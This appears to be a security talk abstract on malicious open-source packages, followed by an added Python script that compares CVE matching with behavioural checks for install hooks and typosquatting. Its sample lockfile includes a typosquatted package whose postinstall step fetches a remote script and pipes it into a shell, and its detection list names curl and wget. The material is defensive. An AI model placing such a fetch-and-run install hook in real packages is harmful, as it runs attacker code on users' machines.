Attackers know that most modern application code is composed primarily of open-source software with a relatively small amount of first-party code. Researchers, including our own, are witnessing, in real time, attackers planting packages containing malicious code into open-source software supply chains. As application developers incorporate these affected libraries into their codebases, the malicious code becomes part of the applications they publish. Making matters worse, these malicious packages are not tracked as CVEs on Mitre.org: organizations have no idea that they have just become victims, because the traditional methods for identifying risky open-source components, which look for known vulnerabilities in legitimate packages, are blind to these attacks. These security concerns are not inherent to open-source software itself, but rather to how malicious software propagates undetected through software supply chains.
Software developers and software security professionals will find this session useful if they would like to learn more about:
· Techniques attackers use to plant malicious code in the supply chain
· The differences between identifying the presence of CVEs in open-source components and outright malicious packages
· Steps to take now so you do not fall victim to these attacks
· How to focus mitigation and remediation efforts without disrupting development teams
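The contrast drawn above between CVE matching and detecting outright malicious packages can be made concrete with a small audit script. The following is an added example written for this page, not code from the session or from any vendor tool: the advisory feed, the list of popular names, the lockfile and the CVE identifiers are all constructed placeholders, and the install-time script URL uses a documentation IP range. It shows why a typosquatted package with a malicious install hook produces zero CVE findings while a behavioural check flags it immediately.

```python
"""Added example (not from the session): a name-and-version CVE lookup beside a
malicious-package check. Every advisory, package and identifier below is
constructed for illustration; the CVE IDs are placeholders, not real entries."""

from dataclasses import dataclass, field

# Constructed advisory feed: name -> [(first_fixed_version, placeholder_id)].
# A release below first_fixed_version is treated as affected.
ADVISORIES = {
    "example-utils": [("2.3.1", "CVE-0000-0001")],
    "example-parser": [("1.0.5", "CVE-0000-0002")],
}

# Constructed list of widely used names an attacker might typosquat.
POPULAR = {"example-utils", "example-parser", "example-request"}

INSTALL_HOOKS = ("preinstall", "install", "postinstall")   # npm-style lifecycle scripts
REMOTE_FETCH = ("curl ", "wget ", "http://", "https://")   # crude "downloads something" signal


@dataclass
class Package:
    name: str
    version: str
    scripts: dict = field(default_factory=dict)


def parse_version(v):
    """Dotted numeric version -> comparable tuple (assumes no pre-release tags)."""
    return tuple(int(p) for p in v.split("."))


def cve_findings(packages):
    """Traditional check: match package name and version against the advisory feed.
    A package with no advisory, however malicious, can never appear here."""
    hits = []
    for pkg in packages:
        for fixed_in, advisory in ADVISORIES.get(pkg.name, []):
            if parse_version(pkg.version) < parse_version(fixed_in):
                hits.append((pkg.name, pkg.version, advisory))
    return hits


def edit_distance(a, b):
    """Levenshtein distance, used to spot names that imitate a popular package."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def malicious_indicators(pkg):
    """Behavioural check: what does the package do at install time, and whose
    name does it resemble? Returns a list of human-readable reasons."""
    reasons = []
    for hook in INSTALL_HOOKS:
        cmd = pkg.scripts.get(hook)
        if cmd is None:
            continue
        reasons.append(f"runs code at install time via '{hook}'")
        if any(tok in cmd for tok in REMOTE_FETCH):
            reasons.append(f"'{hook}' script fetches remote content")
    if pkg.name not in POPULAR:
        for popular in POPULAR:
            if 0 < edit_distance(pkg.name, popular) <= 2:
                reasons.append(f"name is within edit distance 2 of '{popular}'")
    return reasons


def audit(packages):
    """Run both checks and return their findings side by side."""
    malicious = {}
    for pkg in packages:
        reasons = malicious_indicators(pkg)
        if reasons:
            malicious[pkg.name] = reasons
    return {"cves": cve_findings(packages), "malicious": malicious}


# Constructed lockfile: one known-vulnerable release, one clean release, and one
# typosquat that pipes a remote script into a shell during install.
SAMPLE_LOCKFILE = [
    Package("example-utils", "2.2.0"),
    Package("example-parser", "1.0.5"),
    Package("example-utlis", "2.3.1",
            scripts={"postinstall": "curl -s https://203.0.113.7/x.sh | sh"}),
]

if __name__ == "__main__":
    result = audit(SAMPLE_LOCKFILE)
    print("CVE findings:", result["cves"])
    for name, reasons in result["malicious"].items():
        print(f"Malicious indicators for {name}:")
        for r in reasons:
            print("  -", r)
```

Running the script reports exactly one CVE finding, the outdated `example-utils` release, and nothing at all for `example-utlis`, because no advisory exists for it; only the behavioural pass reports that package, for its install hook, its remote fetch and its resemblance to `example-utils`. In a real pipeline the advisory feed would come from a vulnerability database and the popular-name list from registry download statistics, but the blind spot is the same: a feed of known vulnerabilities cannot describe a package whose whole purpose is malicious.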